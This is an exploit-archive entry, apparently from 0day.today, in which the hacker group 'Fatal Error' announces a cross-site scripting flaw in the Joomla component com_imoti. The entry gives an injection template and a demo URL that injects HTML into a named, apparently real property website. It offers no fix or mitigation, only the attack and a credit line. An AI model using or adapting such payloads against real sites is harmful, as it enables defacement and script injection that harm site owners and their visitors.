id: 12295
date: 05/19/2010
title: Joomla Component com_imoti XSS Vulnerability
author: s4r4d0
cves: 

============================================
Joomla Component com_imoti XSS Vulnerability
============================================


[x] Joomla Component Imoti
[x] Author: s4r4d0
[x] Contact: s4r4d0@yahoo.com
[x] Team; Fatal Error
[x] Bug: XSS on Component Imoti
[x] Example: http://www.site.com/index.php?option=com_imoti=[XSS]
[x] Demo: http://www.bulgarian1stlineproperties.com/index.php?option=com_imoti=">><marquee><h1>XSS By Fatal Error</h1><marquee>
[x] Made in Brazil



#  0day.today [2023-03-24]  #